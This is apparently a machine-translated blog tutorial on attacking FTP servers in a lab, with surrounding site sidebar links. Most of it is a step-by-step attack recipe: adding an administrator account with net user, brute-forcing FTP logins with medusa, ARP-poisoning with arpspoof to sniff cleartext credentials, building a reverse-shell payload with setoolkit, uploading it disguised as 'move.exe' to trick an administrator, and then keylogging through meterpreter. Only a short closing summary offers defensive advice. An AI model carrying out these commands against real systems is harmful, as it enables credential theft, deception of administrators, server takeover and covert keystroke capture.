当前位置:网站首页>6-2 vulnerability exploitation - inevitable problems of FTP
6-2 vulnerability exploitation - inevitable problems of FTP
2022-07-02 01:22:00 【Mountain Rabbit 1】

FTP Brute force cracking of user name and password
Windows Next CMD Command to add users 、 And ascension Administrator Administrator rights , Then this user will be logged in FTP Username and password
net user user name User password /add
// Indicates adding a new user name and password
net localgroup administrators user name /add
// Improve management authority
net user admin1 admin1 /add
net localgroup administrators admin1 /add

windows Next FTP The server adds users , Otherwise we can't use what we added admin1 The user login
open iis Manager

Use medusa Brute force cracking tools to crack admin1 User's password

At the end, the corresponding user name and password are output
First use nc Connect ftp service
nc 192.168.1.107 21
USER admin1
PASS admin1

Successful connection
Only if you enter the correct account and password , Will log in successfully
medusa

medusa -h 192.168.1.107 -u admin1 -P /root/Desktop/pass.txt -M ftp

You can see , We finally found the user name and password , We can also not know the user name 、 Password to crack
This is the time , We can use it nc Sign in
FTP User name password verification
FTP The protocol is used in the process of user authentication , The client should communicate with the server , And both of them are in the verification process , The client will send clear text information to the server , The server is in the whole process , The received information is in clear text , for instance , Weak password for login 、 The passwords are in clear text , We can check , Not encrypted , for instance , The client sends admin, In the whole process of transmission to the server , We can all check
We can do it in wireshark Grab a packet to view

Let's go on , Will use nc Connect the current FTP The server , And then use wireshark Carry out the bag , To verify , Our corresponding plaintext transmission
To open the first ftp, choice eth0 Port listening , Mode selection ftp

nc 192.168.1.101 21
USER admin1
PASS admin1

Let's take a look wireshark The bag I caught

You can see , It's all plain text
FTP User name plaintext password sniffing
Because the whole transmission process , All use clear text , No encryption , We can do it in FTP Sniff with the server , Take the corresponding user name and password
utilize arpspoof Conduct ARP Sniffing , So that one of our clients , The connection corresponds to ftp Server time , Cheat the client , We are gateway , So as to obtain the corresponding data package

This is the time , All packets will be sent to kali, We can use wireshark Sniff traffic

Find the corresponding user name and password
ifconfig
arpspoof -i eth0 192.168.1.1 -t 192.168.1.105

arp -a

Cheat success , We see 192.168.1.1 Of mac The address is kali Of mac Address
ftp 192.168.1.107
admin1
admin1

Login successful
Sniffing and brute force cracking , The biggest difference , Is that violent cracking requires a powerful dictionary , And this kind of sniffing , We only need to sniff successfully , You can get the corresponding user name and password , You can log in
FTP What you do after logging in
FTP Mainly used for file transfer , Next , We need to upload a rebound shell, When the administrator clicks shell after , The server will return the corresponding cmd, Execution window 、 Executive authority , Will execute the corresponding command
utilize metasploit Create a rebound shell Upload to FTP The server . You can use setookit Quickly generate rebound shell.

setoolkit
4
2
192.168.1.106
4445

To ensure that there is no conflict , We can view the current kali Open ports
netstat -pantu

We found that 4445 port , Not in the current content , We can use it 4445 port , As a rebound listening port

This is the time , Start to generate the corresponding payload
Turn on monitoring
Let's turn on another terminal
cd /root/.set
ls
mv payload.exe /root/Desktop/

This is the time , We can use ftp, Put the corresponding payload Upload , Use flashfxp Software , Upload

After successful upload , Will be in FTP In the root directory of the server , Generate payload.exe

We need to lure the administrator to click , Corresponding exe file , We need to modify , such as move.exe

Is likely to , The administrator will double-click , We can do that kali among , View terminal

Among terminals , There will be a corresponding connection
sessions -l
// see

sessions -i 1

You can see the connection , We can operate
HELP

We can operate the keyboard and so on
sysinfo
// View the current session among win2k3 Information about

keyscan_start
keyscan_dump

summary
At the same time, master FTP The files under the , Don't mess , We must strengthen the corresponding management , Otherwise we click exe file , It will lead to the fall of the server , Also found from the side , We need to FTP Users should strengthen management , Avoid revealing their user names and passwords , And we need to be in the LAN , Maintain it safely , prevent arp Sniff our ftp Plaintext user name and password
边栏推荐
- The author is more willing to regard industrial Internet as a concept much richer than consumer Internet
- [eight sorting ③] quick sorting (dynamic graph deduction Hoare method, digging method, front and back pointer method)
- With the acquisition of Xilinx, AMD is more than "walking on two legs" | Jiazi found
- Exclusive delivery of secret script move disassembly (the first time)
- Exclusive delivery of secret script move disassembly (the first time)
- [image enhancement] vascular image enhancement based on frangi filter with matlab code
- Global and Chinese market of wireless chipsets 2022-2028: Research Report on technology, participants, trends, market size and share
- GL Studio 5 installation and experience
- How to compress video size while adding watermark with one click?
- How does schedulerx help users solve the problem of distributed task scheduling?
猜你喜欢

学习笔记24--多传感器后融合技术

MySQL application day02

It's already 30. Can you learn programming from scratch?

浅浅了解Servlet

2022年6月国产数据库大事记
![[WesternCTF2018]shrine writeup](/img/26/1700095c9b38b9b74a1b1136e5d5de.jpg)
[WesternCTF2018]shrine writeup
![[rust web rokcet Series 2] connect the database and add, delete, modify and check curd](/img/23/cfa13ad30e45ef7cdda690775964a7.jpg)
[rust web rokcet Series 2] connect the database and add, delete, modify and check curd

Minimize the error

Geek DIY open source solution sharing - digital amplitude frequency equalization power amplifier design (practical embedded electronic design works, comprehensive practice of software and hardware)

Data visualization in medical and healthcare applications
随机推荐
Comprehensive broadcast of global and Chinese markets 2022-2028: Research Report on technology, participants, trends, market size and share
MySQL winter vacation self-study 2022 12 (4)
[image enhancement] vascular image enhancement based on frangi filter with matlab code
Global and Chinese markets for distributed generation and energy storage in telecommunications networks 2022-2028: Research Report on technology, participants, trends, market size and share
Docker安装Oracle_11g
关于ASP.NET CORE使用DateTime日期类型参数的一个小细节
Study note 2 -- definition and value of high-precision map
Two TVs
[rust web rokcet Series 2] connect the database and add, delete, modify and check curd
Leetcode 45 Jumping game II (2022.02.14)
I'll teach you to visit Amazon RDS for a year and build a MySQL cloud database (only 10 minutes, really fragrant)
Global and Chinese market of picture archiving and communication system (PACS) 2022-2028: Research Report on technology, participants, trends, market size and share
Recently, three articles in the nature sub Journal of protein and its omics knowledge map have solved the core problems of biology
Minimize the error
GL Studio 5 installation and experience
只是以消费互联网的方式和方法来落地和实践产业互联网,并不能够带来长久的发展
卷积神经网络(包含代码与相应图解)
Global and Chinese markets for power over Ethernet (POE) solutions 2022-2028: Research Report on technology, participants, trends, market size and share
How can I batch produce the same title for the video?
[eight sorting ③] quick sorting (dynamic graph deduction Hoare method, digging method, front and back pointer method)